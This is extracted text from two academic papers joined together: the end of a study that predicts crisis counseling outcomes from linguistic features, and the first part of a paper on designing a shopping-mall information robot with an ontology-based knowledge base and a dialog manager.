Fonversations 0-20 20-40 40-60 60-80 80-100 3ortion of conversation (% of Pessages) 0.12 0.14 0.16 0.18 0.20 0.22 0.24 0.26 0.28 0.30 3 as t r el at iv e fr eq ue nc y 3ositive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.60 0.62 0.64 0.66 0.68 0.70 0.72 0.74 0.76 P re se nt r el at iv e fr eq ue nc y Positive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.70 0.75 0.80 0.85 6 el f r el at iv e fr eq ue nc y Positive conversations 1egative conversations 0-20 20-40 40-60 60-80 80-100 Portion of conversation (% of Pessages) 0.4 0.5 0.6 0.7 0.8 P os eP o re la tiv e fr eq ue nc y Positive conversations 1egative conversations A1: Past B: Self C: Sentiment A2: Present A3: Future Figure 9: A: Throughout the conversation there is a shift from talking about the past to future, where in positive conversations this shift is greater; B: Texters that talk more about others more often feel better after the conversation; C: More positive sentiment by the texter throughout the conversation is associated with successful conversations. 9 Predicting Counseling Success In this section, we combine our quantitative insights into a prediction task. We show that the linguistic as- pects of crisis counseling explored in previous sec- tions have predictive power at the level of individ- ual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. Specifically, we create a balanced dataset of positive and negative conversations more than 30 messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. There are 3619 such negative conver- sations and and we randomly subsample the larger set of positive conversations. We train the model with batch gradient descent and use L1 regulariza- tion when n-gram features are present and L2 reg- ularization otherwise. We evaluate our model with 10-fold cross-validation and compare models using the area under the ROC curve (AUC). Features. We include three aspects of counselor messages discussed in Section 6: hedges, check questions, and the similarity between the counselor’s message and previous texter message. We add a measure of how much progress the counselor has made (Section 7) by computing the Viterbi path of stages for the conversation (only for the first x%) with the HMM conversation model and then adding the duration of each stage (in #messages) as a fea- ture. Additionally, we add average message length 0.2 0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0 Percent of conversation seen by the model 0.56 0.58 0.60 0.62 0.64 0.66 0.68 0.70 0.72 R O C a re a un de r th e cu rv e sc or e Full model N-gram features only Figure 10: Prediction accuracies vs. percent of the con- versation seen by the model (without texter features). and average sentiment per message using VADER sentiment (Hutto and Gilbert, 2014). Further, we add temporal dynamics to the model by adding fea- ture conjunctions with the stages HMM model. Af- ter running the stages model over the x% of the con- versation available to the classifier, we add each fea- ture’s average value over each stage as additional features. Lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features. Because the focus of this work is on counseling strategies, we primar- ily experiment with models using only features from counselor messages. For completeness, we also re- port results for a model including texter features. Prediction Results. The model’s accuracy increases with x, and we show that the model is able to dis- 473 Features ROC AUC Counselor unigrams only 0.630 Counselor unigrams and bigrams only 0.638 None 0.5 + hedges 0.514 (+0.014) + check questions 0.546 (+0.032) + similarity to last message 0.553 (+0.007) + duration of each stage 0.561 (+0.008) + sentiment 0.590 (+0.029) + message length 0.596 (+0.006) + stages feature conjunction 0.606 (+0.010) + counselor unigrams and bigrams 0.652 (+0.046) + texter unigrams and bigrams 0.708 (+0.056) Table 5: Performance of nested models predicting con- versation outcome given the first 80% of the conversa- tion. In bold: full models with only counselor features and with additional texter features. tinguish positive and negative conversations after only seeing the first 20% of the conversation (see Figure 10). We attribute the significant increase in performance for x = 100 (Accuracy=0.687, AUC=0.716) to strong linguistic cues that appear as a conversation wraps up (e.g., “I’m glad you feel better.”). To avoid this issue, our detailed feature analysis is performed at x = 80. Feature Analysis. The model performance as fea- tures are incrementally added to the model is shown in Table 5. All features improve model accuracy sig- nificantly (p < 0.001; paired bootstrap resampling test). Adding n-gram features produces the largest boost in AUC and significantly improves over a model just using n-gram features (0.638 vs. 0.652 AUC). Note that most features in the full model are based on word frequency counts that can be derived from n-grams which explains why a simple n-gram model already performs quite well. However, our model performs well with only a small set of lin- guistic features, demonstrating they provide a sub- stantial amount of the predictive power. The effec- tiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations. 10 Conclusion & Future Work Knowledge about how to conduct a successful coun- seling conversation has been limited by the fact that studies have remained largely qualitative and small- scale. In this work, we presented a large-scale quan- titative study on the discourse of counseling con- versations. We developed a set of novel computa- tional discourse analysis methods suited for large- scale datasets and used them to discover actionable conversation strategies that are associated with bet- ter conversation outcomes. We hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. For ex- ample, our insights could help improve counselor training and give rise to real-time counseling qual- ity monitoring and answer suggestion support tools. Acknowledgements. We thank Bob Filbin for fa- cilitating the research, Cristian Danescu-Niculescu- Mizil for many helpful discussions, and Dan Ju- rafsky, Chris Manning, Justin Cheng, Peter Clark, David Hallac, Caroline Suen, Yilun Wang and the anonymous reviewers for their valuable feedback on the manuscript. This research has been sup- ported in part by NSF CNS-1010921, IIS-1149837, NIH BD2K, ARO MURI, DARPA XDATA, DARPA SIMPLEX, Stanford Data Science Initiative, Boe- ing, Lightspeed, SAP, and Volkswagen. References Tim Althoff and Jure Leskovec. 2015. Donor retention in online crowdfunding communities: A case study of DonorsChoose.org. In WWW. Tim Althoff, Cristian Danescu-Niculescu-Mizil, and Dan Jurafsky. 2014. How to ask for a favor: A case study on the success of altruistic requests. In ICWSM. Vikas Ganjigunte Ashok, Song Feng, and Yejin Choi. 2013. Success with style: Using writing style to pre- dict the success of novels. In EMNLP. Regina Barzilay and Lillian Lee. 2004. Catching the drift: Probabilistic content models, with applications to generation and summarization. In HLT-NAACL. Aaron T. Beck. 1967. Depression: Clinical, experimen- tal, and theoretical aspects. University of Pennsylva- nia Press. Philip Bramsen, Martha Escobar-Molano, Ami Patel, and Rafael Alonso. 2011. Extracting social power rela- tionships from natural language. In HLT-NAACL. Marc Brysbaert, Amy Beth Warriner, and Victor Kuper- man. 2014. Concreteness ratings for 40 thousand generally known English word lemmas. Behavior Re- search Methods, 46(3). R. Sherlock Campbell and James W. Pennebaker. 2003. The secret life of pronouns: Flexibility in writing style and physical health. Psychological Science, 14(1). 474 Ge Chen. 2014. Visualizations for mental health topic models. Master’s thesis, MIT. Cristian Danescu-Niculescu-Mizil, Lillian Lee, Bo Pang, and Jon Kleinberg. 2012. Echoes of power: Language effects and power differences in social interaction. In WWW. Cristian Danescu-Niculescu-Mizil. 2012. A computa- tional approach to linguistic style coordination. Ph.D. thesis, Cornell University. Karthik Dinakar, Allison J.B. Chaney, Henry Lieberman, and David M. Blei. 2014a. Real-time topic models for crisis counseling. In KDD DSSG Workshop. Karthik Dinakar, Emily Weinstein, Henry Lieberman, and Robert Selman. 2014b. Stacked generalization learning to analyze teenage distress. In ICWSM. Karthik Dinakar, Jackie Chen, Henry Lieberman, Ros- alind Picard, and Robert Filbin. 2015. Mixed- initiative real-time topic modeling & visualization for crisis counseling. In ACM ICIUI. Marco Guerini, Alberto Pepe, and Bruno Lepri. 2012. Do linguistic style and readability of scientific ab- stracts affect their virality? In ICWSM. Shane Haberstroh, Thelma Duffey, Marcheta Evans, Robert Gee, and Heather Trepal. 2007. The experi- ence of online counseling. Journal of Mental Health Counseling, 29(3). Christine Howes, Matthew Purver, and Rose McCabe. 2014. Linguistic indicators of severity and progress in online text-based therapy for depression. CLPsych Workshop at ACL 2014. Rongyao Huang. 2015. Language use in teenage crisis intervention and the immediate outcome: A machine automated analysis of large scale text data. Master’s thesis, Columbia University. C.J. Hutto and Eric Gilbert. 2014. Vader: A parsimo- nious rule-based model for sentiment analysis of social media text. In ICWSM. Thomas R. Insel. 2008. Assessing the economic costs of serious mental illness. The American Journal of Psychiatry, 165(6). John Kalafat, Madelyn Gould, Jimmie Lou Harris Mun- fakh, and Marjorie Kleinman. 2007. An evaluation of crisis hotline outcomes part 1: Nonsuicidal crisis callers. Suicide and Life-threatening Behavior, 37(3). William Labov and David Fanshel. 1977. Therapeutic discourse: Psychotherapy as conversation. Dana Heller Levitt and Jodi D. Jacques. 2005. Promot- ing tolerance for ambiguity in counselor training pro- grams. The Journal of Humanistic Counseling, Edu- cation and Development, 44(1). Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg Cor- rado, and Jeff Dean. 2013. Distributed representa- tions of words and phrases and their compositionality. In NIPS. National Institute of Mental Health. 2015. Any mental illness (AMI) among U.S. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. Retrieved June 3, 2016. Kate G. Niederhoffer and James W. Pennebaker. 2002. Linguistic style matching in social interaction. Jour- nal of Language and Social Psychology, 21(4). Michael J. Paul. 2012. Mixed membership Markov models for unsupervised conversation modeling. In EMNLP-CoNLL. James W. Pennebaker, Matthias R. Mehl, and Kate G. Niederhoffer. 2003. Psychological aspects of natural language use: Our words, our selves. Annual Review of Psychology, 54(1). John P. Pestian, Pawel Matykiewicz, Michelle Linn-Gust, Brett South, Ozlem Uzuner, Jan Wiebe, Kevin B. Co- hen, John Hurdle, and Christopher Brew. 2012. Senti- ment analysis of suicide notes: A shared task. Biomed- ical informatics insights, 5(Suppl. 1). Tom Pyszczynski and Jeff Greenberg. 1987. Self- regulatory perseveration and the depressive self- focusing style: A self-awareness theory of reactive de- pression. Psychological Bulletin, 102(1). Tom Pyszczynski, Kathleen Holt, and Jeff Greenberg. 1987. Depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. Journal of Personality and Social Psychology, 52(5). Nairan Ramirez-Esparza, Cindy Chung, Ewa Kacewicz, and James W. Pennebaker. 2008. The psychology of word use in depression forums in English and in Span- ish: Testing two text analytic approaches. In ICWSM. Shiquan Ren, Hong Lai, Wenjing Tong, Mostafa Amin- zadeh, Xuezhang Hou, and Shenghan Lai. 2010. Non- parametric bootstrapping for hierarchical data. Jour- nal of Applied Statistics, 37(9). Alan Ritter, Colin Cherry, and Bill Dolan. 2010. Unsu- pervised modeling of Twitter conversations. In HLT- NAACL. Harvey Sacks and Gail Jefferson. 1995. Lectures on con- versation. Wiley-Blackwell. Andreas Stolcke, Klaus Ries, Noah Coccaro, Eliza- beth Shriberg, Rebecca Bates, Daniel Jurafsky, Paul Taylor, Rachel Martin, Carol Van Ess-Dykema, and Marie Meteer. 2000. Dialogue act modeling for automatic tagging and recognition of conversational speech. Computational Linguistics, 26(3). Yla R. Tausczik and James W. Pennebaker. 2010. The psychological meaning of words: LIWC and comput- erized text analysis methods. Journal of Language and Social Psychology, 29(1). 475 http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml Teun Van Dijk. 1997. Discourse studies: A multidisci- plinary approach. SAGE. World Health Organization. 2015. Depression: Fact sheet no 369. http://www.who.int/ mediacentre/factsheets/fs369/en/. Re- trieved November 2, 2015. Jaewon Yang, Julian McAuley, Jure Leskovec, Paea LePendu, and Nigam Shah. 2014. Finding pro- gression stages in time-evolving event sequences. In WWW. 476 http://www.who.int/mediacentre/factsheets/fs369/en/ http://www.who.int/mediacentre/factsheets/fs369/en/ work_pd3ghpw4jneotm27sbfmo55ndi ---- What should we know to develop an information robot? Submitted 14 March 2015 Accepted 28 May 2015 Published 10 June 2015 Corresponding author Satoru Satake, satoru@atr.jp Academic editor Yaochu Jin Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.8 Copyright 2015 Satake et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS What should we know to develop an information robot? Satoru Satake, Keita Nakatani, Kotaro Hayashi, Takyuki Kanda and Michita Imai ATR Intelligent Robotics and Communication Laboratory, Kyoto, Japan ABSTRACT This paper is aimed at identifying the required knowledge for information robots. We addressed two aspects of this knowledge, ‘what should it know’ and ‘what should it do.’ The first part of this study was devoted to the former aspect. We investigated what information staff know and what people expect from information robots. We found that there are a lot of similarities. Based on this, we developed a knowledge structure about an environment to be used to provide information. The developed knowledge structure worked well. In the field study we confirmed that the robot was able to answer most of the requests (96.6%). However, regarding the latter aspect, although we initially replicated what human staff members do, the robot did not serve well. Many users hesitated to speak, and remained quiet. Here, we found that the knowledge for facilitating interaction was missing. We further designed the interaction flow to accommodate people who tend to be quiet. Finally, our field study revealed that the improved interaction flow increased the success ratio of information providing from 54.4% to 84.5%. Subjects Robotics Keywords Information-providing, Direction giving, Belief about robots INTRODUCTION Direction giving is often considered as a desired task for social robots and embodied agents (Cassell et al., 2002; Kopp et al., 2008; Ono, Imai & Ishiguro, 2001; Okuno et al., 2009). In our daily life, one of the roles that frequently offer direction giving is information service (Fig. 1). Such information booths/counters can be found in stations, airports, shopping malls, and sightseeing places. We wondered what would be the required ‘knowledge’ to develop for a robot that engages in such an information service. Probably, most of us have experienced using information services, and many of us believe that we know what the information services are. Thus, one would argue that it is just easy to develop such a robot. One might say that “I know from common sense what the information service is. I can just implement it.” Is this true? We started the study with two research questions: • Is our common knowledge about the tasks of information services (i.e., what they serve) applicable to information robot? How to cite this article Satake et al. (2015), What should we know to develop an information robot? PeerJ Comput. Sci. 1:e8; DOI 10.7717/peerj-cs.8 mailto:satoru@atr.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.8 http://dx.doi.org/10.7717/peerj-cs.8 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 1 Information service. • Can we create an information robot by replicating what human information staff knows and does? Or, is there any missing knowledge? We first investigated what people would expect from an information robot, and confirmed that there are a lot of similarities with what human information staff does (section ‘Information in a Shopping Mall’). Thus, we decided to use knowledge about human information staff (what they know and what they do), and developed an information robot (section ‘System’). However, in regard to the second research question, the assumption was not true. Thus, we further investigated missing knowledge (sections ‘Preliminary Trials: Lack of ‘Knowledge’ for Interaction’ and ‘Field Experiment’). RELATED WORKS Information-providing robots Robots have been deployed as tour guides. There were a couple of museum robots that navigated around the environment and provided explanations (Thrun et al., 1999). Robots Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 2/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 are also used for interactive information-providing. For instance, Gross et al. (2009) developed an article search robot which enables visitors to request an item and let the robot navigate to its location. Input for these robots is often with GUIs, thus there are lists of destinations/items, one of which is chosen by the user. In contrast, in case of dialog-based system, the difficulty is to predict the set of requests users could ask. Thus, there are assumptions made for the input, such as name of locations. For instance, a virtual agent, Mack, developed by Cassell et al. (2002) is able to respond with the names of locations and people in offices, and provide direction giving (Kopp et al., 2008). But, in a real-world natural interaction, what users would ask for is not bound by such assumptions. In Kanda et al. (2009), the robot provided direction-giving interaction in response to the name of locations in a shopping mall, and exceptions were handled by a human operator. That is, the system on its own did not address the questions beyond the assumptions. Overall, in the previous studies, there was not much exploration for what people would ask/request in an information dialog with a robot. In contrast, we found that people ask various requests beyond the names of locations, and identified a required knowledge representation. Direction-giving interaction It is reported that a good direction consists of pairs of actions and landmarks (Daniel et al., 2003), such as “turn right at the post office, and . . . .” To provide such explanations, there is a technique to build a knowledge about spatial relationships among shops and corridors (Morales et al., 2011). There are techniques to make a robot understand directions from humans (Kollar et al., 2010); in the study of Kollar and colleagues, the representation stores the relationship between the description of the entities in the space and the map. In these studies, the common assumption is that a system is able to provide directions if the name of a location is asked. In contrast, our study reveals other type of requests in information dialog, and we report on the required knowledge representation. Note that it is well known in HRI studies that gaze and pointing gestures make the interaction more natural and effective (e.g., Sidner et al., 2004; Mutlu, Forlizzi & Hodgins, 2006). The use of gesture in direction giving is also studied in conversational agents (Kopp et al., 2008) as well as in human-like robots (Ono, Imai & Ishiguro, 2001; Okuno et al., 2009). Our direction-giving behavior is informed by these studies. Engagement In our study, we noticed some visitors remained silent, even after directly approaching the robot and hearing its requests to engage. Relevant to this, there were studies about “engagement” process; that is, when people participate and feel connected in collaboration, their gaze will meet with each other and they do not quit the interaction (Sidner, Lee & Lesh, 2003). Rich and his colleagues developed a technique to detect engagement using people gaze (Rich et al., 2010). Kobayashi and his colleagues developed a technique to select a person to whom a robot should ask questions in multi-party interaction in the way a teacher appoints a student in a class for an answer (Kobayashi et al., 2010). Their technique Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 3/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 is based on the findings that people nodding and engaging in mutual gaze are more likely to answer than someone avoiding a meeting gaze. In contrast, the silent visitors in our study were people who voluntarily approached the robot. They typically behaved as if they were willing to interact with the robot but did not talk with it. Knowledge representation There are several computer applications (e.g., Google search or Apple’s Siri) that provide information related to location. There are many similar aspects between our robot and such applications, e.g., both need connection between language and local knowledge, interpretation needs to be contextual, and answers to be provided in verbal way. Thus, similarly to these approaches, we used ontology (McGuinness & Van Harmelen, 2004) to build the knowledge representation. However, we need to build our own knowledge representation because required the knowledge structure is different, and we cannot simply apply existing software like Google search and Siri for the robot. For instance, robots can use pointing gesture (also, often robots are not equipped with display), which very much changes the way of giving direction. INFORMATION IN A SHOPPING MALL We investigated the daily tasks of information service employees and what visitors typically expect from robots acting as such. We found a lot of similarities. The study protocol was approved by institutional review boards of Advanced Telecommunications Research Instituted International with reference number 14-502-2. Daily tasks of information service We interviewed two employees working at the information desk of a shopping mall. First we asked an overall description of their job: they usually wait for visitors to come to the information booth. They were requested by the mall administrators to serve as ‘information staff.’ Only procedures for lost items were provided; for other tasks (e.g., information providing) they use their common sense. Further, we asked them to categorize the typical requests from visitors, and how they would respond. Both reported that there are three types of requests: Direction giving: They reported that this is the most frequent request. Visitors ask simple where-type questions, e.g., “where are the toilets?” In addition to the name of locations, people use other popular name, like “hello show,” or the name of designated areas, like “smoking area.” Their typical response is to provide turn-by-turn directions using utterance and pointing gesture. When visitors do not understand, they sometimes write down to a map, or on rare occasions take them to the destination. Recommendation (inquiry): When a visitor does not know whether there are shops that meet his needs, he may query the information staff. Visitors may inquire of the characteristics of shops, such as name of items, and the category of shops. Here are some examples of questions: “Are there Japanese restaurants?”; “Are there shops that sell Osaka souvenirs?” The staff members typically verbally list the shops or events that meet their criteria. Visitors sometimes ask for a recommendation from the staff without providing Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 4/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 solid conditions but only using subjective words e.g., “Are there any good restaurants?” For such requests, the staff members reported that they typically try not to give a subjective preference, because their preferences may or may not match with those of the visitors. Thus, their responses for inquiry and recommendation are similar: they try to objectively reply and provide a list of shops that seem appropriate. Lost child and lost-and-found: When children are lost, or when visitors lose items, they come to the information desk. For lost children, the staff usually makes a public announcement throughout the shopping mall. Lost items can be retrieved at the information booth when available upon confirmation of ownership. Expectations from information robot To investigate what people expect from information robots, we interviewed customers in the shopping mall. To find people who would be willing to help us with collecting knowl- edge for future robots, we prepared a situation where visitors can see a robot in the midst of interaction. Thus, we prepared a robot for information, which is controlled with Wizard- of-Oz method. We then asked people who stopped around the robot and/or interacted with it to participate in the interview. Twenty-one visitors participated in the interview. In the interview, we asked the visitors to imagine future situations in which robots would be capable of offering information services they like, regardless of their previous observations of the robot’s capability. We then asked them to freely provide as many functions they would like information robots to have. The interviews were recorded and transcribed for analysis. We categorized the different kind of requests expressed by the visitors, For instance, visitors reported sentences such as: “I often look for the smoking area, thus I would like to ask the robot about it.” This utterance was coded as expectation for direction giving, because we interpret it as ‘where’-type question in which visitors simply want to know the location. The followings ones were coded as expectation for recommendation (inquiry): “I’d like to know about sports and furniture shops.” “The shop which sells the most? Well, I want the robot give me recommendations of shops.” Such cases were classified as recommendation (inquiry), because visitors need to know more information than just a location. Then, two coders who do not know the research purpose judged whether each transcribed sentence would fit into the above defined categories, or not (which is categorized as ‘other’). The judgement of the two coders matches reasonably well, yielding kappa coefficient .857. Table 1 shows the coding result. The ratio of visitors who mention the expectation is listed in each row. They can provide multiple answers, thus the sum of the ratios exceeds 100%. The expectation of the visitors for the information robot largely overlaps with what human information services provide. Almost all visitors (20 out of 21) mentioned that they expect direction giving and the majority (16 out of 20) reported that they expect the Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 5/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Table 1 The analysis result of expectation for information. Expectation Ratio Direction giving 95.2% Recommendation (inquiry) 76.2% Other Playing with children 23.8% Lost child 4.8% robot to offer turn-by-turn direction accompanied with pointing gesture. For instance, one spontaneously mentioned the practicality of pointing gesture in directions giving: “Well, ‘where,’ umm, I did not understand ‘which’ direction I should go. So it would be useful if the robot could do pointing gestures,” There were 3 visitors who expected the robot to take them to the destination, and 1 visitor who wanted the robot to explain with a map. There were 16 people that expected a recommendation service. For instance, some mentioned “I’d like to have some recommendations for restaurants,” or “I’d like to know places where children can play around.” Others wanted to have more detailed explanations. For instance, one commented: “I’d like to know what kind of shop it is, its atmosphere, what it sells, and so on.” In contrast, the ‘playing with children’ category is specific to the information robot. We collected comments such as: “Interacting with the robot was enjoyable. This is good for people who come with their children”. “Many families only have one child. It would be nice if the robot behaved like a brother.” Requirements The expectations for information robots largely overlapped with what is delivered at human information services. That is, most of them expect two services: direction giving and recommendations. Thus, in this study, we focused on these two services. Further, we investigated the required knowledge to be stored. We analyzed the utterances of the requests. We labeled them based on the type of request. For instance, we assigned a label ‘name of location’ to the utterance “I’d like to know where the event dream world takes place,” ‘name of item’ to the utterance “I’d like to know where can I buy coffee.” If multiple labels are applicable we assigned all of them. Labels are merged when possible, resulting in 6 different labels. To confirm the classification, we asked two coders who did not know the purpose of the research to classify the utterances based on the 6 labels. Their coding matches reasonably well, yielding kappa coefficient of .637. Finally, we identified that the following information is needed: (1) Name of location: such as names of shops or names of events. In addition to the formal name, people use various nicknames. 78.3% of people mentioned this category. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 6/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 2 System architecture. (2) Item name: people look for specific product or entity available in shops. For instance, this category includes items such as “cell phone charger” and “coffee.” 47.8% of people mentioned this category. (3) Category: shops can usually be grouped into larger categories, like “restaurant,” “Japanese restaurant.” 52.2% of people mentioned this category. (4) Features: shops are usually recognized as some generally-known features, like “good view,” “expensive,” and “recommended.” 65.2% of people mentioned this category. (5) People activity: locations are sometimes referred as the activity that people do there, like “play,” “eat,” “shop.” 60.9% of people mentioned this category. (6) People’s state: locations are sometimes referred as the place appropriate for people’s physical condition, like “injured,” “tired,” “hungry.” For instance, some visitors said: “I would like to receive recommendation, just by saying ‘I’m hungry’ for example.” 13.0% of people mentioned this category; note that this request was not reported by the information desk staff, thus it can be considered as specific to the information robot. Based on this analysis, we developed the knowledge representation for the information robot. SYSTEM Architecture Our goal is to develop a robot that autonomously provides information services. Based on the analysis in section ‘Information in a Shopping Mall,’ we developed a knowledge representation that can be used by such a robot. Figure 2 shows the architecture of the system. Information from sensors goes through modules like people tracking (explained in section ‘People tracking’), localization (section ‘Localization’), and speech recognition (section ‘Speech recognition (with human operator)’). Output from these modules are used in the behavior controller (section ‘Behavior controller’), which contains a dialog manager (section ‘Dialog manager’). The environmental knowledge is stored in ontology (section ‘Ontology of entities in the map’) and map (section ‘Route perspective map’), and used by the dialog manager. We explain these modules in the later section. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 7/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 3 Environment of the shopping mall. Figure 4 Knowledge representation for the environment. Knowledge representation There are two types of information in the knowledge representation. One is the map used for direction giving (explained in section ‘Route perspective map’). The other is shop-related data (explained in section “Ontology of entities in the map’). Environment The study was conducted in a big shopping mall located in a suburban area. It consists of three buildings (Fig. 3A), one having 12 floors, and others having 6 floors. There are 51 shops, 31 restaurants, 42 facilities, 6 event halls, 4 squares (e.g., Fig. 3B), 2 stages, and many offices. The mall is mainly busy during weekends. Almost all shops are for non-daily goods, like clothes, shoes, sports, outdoor activities. We often observe people who look for shops and locations (e.g., they look at the floor maps, and/or ask the service staff ). The main hall where big events take place is located far (a 5 min of walk) from the square where we put the robot, thus people often asked where an event was taking place. Ontology of entities in the map We designed our knowledge representation for ‘request’ and ‘shops’ together using an ontology language, OWL (McGuinness & Van Harmelen, 2004). Figure 4 shows the designed knowledge structure, i.e., ontology. The basic element in OWL is the ‘class,’ which has ‘properties’ that store the information. There are two primary classes, ‘location entity’ and ‘requestable property’ prepared. Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 8/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Table 2 Possible relationships. Users’ request Possible relation Item name Is sold at/is served at/is at Category Belongs to Features Is a feature of People activity Is possible at People’s state Is satisfied/healed/solved at Location entity We define entities like shops, facilities and events as instances of the ‘location entity’ class. There are three properties: (1) Name: we stored the official or commonly used name. (2) Nicknames: some shops are referred to with a nickname. We listed such nicknames people could use. For example, “Kentucky Fried Chicken” is referred as “KFC.” (3) Location on the geometrical map: each location is associated with the geometrical map (explained in the section ‘Route perspective map’). We further separate the class into two subclasses, selective location and non-selective location. When multiple locations are available, people would prefer to select one. For instance, if there are two Italian restaurants, people would choose one based on their own criteria, such as better, cheap, popular, etc. We store one extra property, ‘introduction property,’ in selective location to be used in dialog to help people selecting locations. In contrast, people would usually not care about which toilets to which they would go. Such locations are implemented as non-selective location class. Requestable property There are six types of information communicated in information dialog (section ‘Requirements’). Except for name of location, they are realized as ‘requestable property’ class, which has subclasses ‘item name,’ ‘category,’ ‘features,’ ‘people activity,’ and ‘people’s state.’ When a user requests information, it is turned into an instance of the ‘requestable property.’ Then, the location(s) having the same property will be searched. Each property item has wordings that are expected to be used in people’s utterance. For instance, ‘eat’ (instance of people’s activity subclass) is associated with wordings such as “eat,” “have lunch,” and “have a meal.” Note that more complex requests (e.g., “Japanese” restaurant with a “good view”) can be represented as multiple instances combined with ‘and/or’ operators, but we did not implement such complex operations because users rarely made such complex requests. Relationships between ‘location entity’ and ‘requestable property’ Table 2 shows possible relationships between two subclasses. For instance, some visitors could request a restaurant where they can have “pasta.” To handle such requests, a “pasta” entity is prepared as an instance of ‘item name’ subclass which is associated with shops with Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 9/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Figure 5 Illustration of the route perspective map. the relation ‘is served at.” Such relation is defined inside dialog management (section ‘Be- havior controller’) as well. Note that an instance of ‘requestable property’ can be associated with multiple ‘location entities’ (e.g., “pasta” can be served at multiple restaurants). Finally, we prepared the data for the shopping mall (section ‘Environment’). There are 201 location entities (84 shops, 75 service facilities, 39 events, and 3 buildings) with in total 3,345 nicknames. There are 530 requestable properties (501 items, 163 categories, 44 features, 63 people activities, 22 people’s states) prepared as well. Route perspective map Informed by Morales et al. (2011), we manually prepared a route perspective map (illustrated in Fig. 5), which consists of pairs of landmarks and actions. Using the map, the system generates turn-by-turn directions giving, such as “go straight, turn left at the book store, go out the door with exit sign . . . .” The map includes the following information: (1) Topological map: Nodes are located at decision points in the map. Transition through corridor or between different floors, such as stairs, escalators, and elevators, are expressed as movements between nodes. Entrances of shops, facilities, and events (i.e., location entity) are also represented as nodes. (2) Landmarks: If available, visible landmarks are manually associated for each route as denoted in Morales et al. (2011), e.g., famous shop names with salient signboards, elevators, and escalators. (3) Actions: In Morales et al. (2011), actions were only turning behaviors, which were computed from a topological map. In contrast, as there are many floors and multiple buildings, we added actions like “enter the next building,” “go to the 3rd floor.” Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 10/23 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.8 Behavior controller When a person stops by the robot (within 2.5 m for 3.0 s), or is detected as approaching at 2.5 m from it, it starts a dialog. The robot orients its body and gaze to the user. When there is no user, the robot shows liveliness by slightly moving head and arms. During the dialog, its head and body is oriented toward the user, except for the moment when it performs a pointing gesture which is often used when giving directions. When it points at a direction, its head direction is oriented toward the pointed direction for the first three seconds of pointing in order to draw the user’s attention toward the pointed direction. The robot ends the dialog when the user leaves the robot’s side (3 m away), or when the dialog management module decides to end the dialog. Dialog manager We developed a rule-based mechanism for dialog management. Assuming that there is an input coming from the speech recognition module (explained in ‘Speech recognition (with human operator)’), the input is turned into text and matched with name/nickname properties of location entities and with instances of requestable properties (explained in ‘Ontology of entities in the map’). If a requestable property matched, it is compared with location entities. When only non-selective locations are matched, it chooses the nearest one. In case the user asked for a location with a specific name of location, there should be only one location to be matched. In these cases, the system provides direction-giving dialog, in which turn-by-turn directions to the location are generated. Otherwise, it initiates a recommendation dialog. It verbally lists the locations that match with the requestable property instance one by one. For each location, it explains the location using the text in its introduction property. For instance, it utters “Ramen is served at a ramen restaurant named Kaika-ya. They serve a ramen with tuna soup. May I explain the directions to go there?” As human staff does, we carefully avoid telling subjective preferences, but only provided objective facts. In addition, it reacts to the words for greeting. When an input matches with words like “hello,” it returns a greeting utterance. When an input matches with leave-taking words like “bye,” it returns leave-taking words and ends the dialog. When no location is matched, the system explains that “(requested item) is not in this shopping mall. I only know about this mall.” Other modules Robot We used a robot characterized by its human-like physical expressions. It is 120 cm high and 40 cm in diameter on a mobile platform. It has a 3-DOF head and 4-DOF arms. There are two 30 m range laser sensors attached. We used the robot with a maximum speed of 550 mm/sec and 50 ◦/s for rotations. The accelerations are set to 300 mm/s2 and 50 ◦/s2. To clearly communicate its role, we put an ‘information staff ’ sign in Japanese on the chest of the robot (Fig. 1). Satake et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.8 11/23 https://peerj.com/computer-science/ 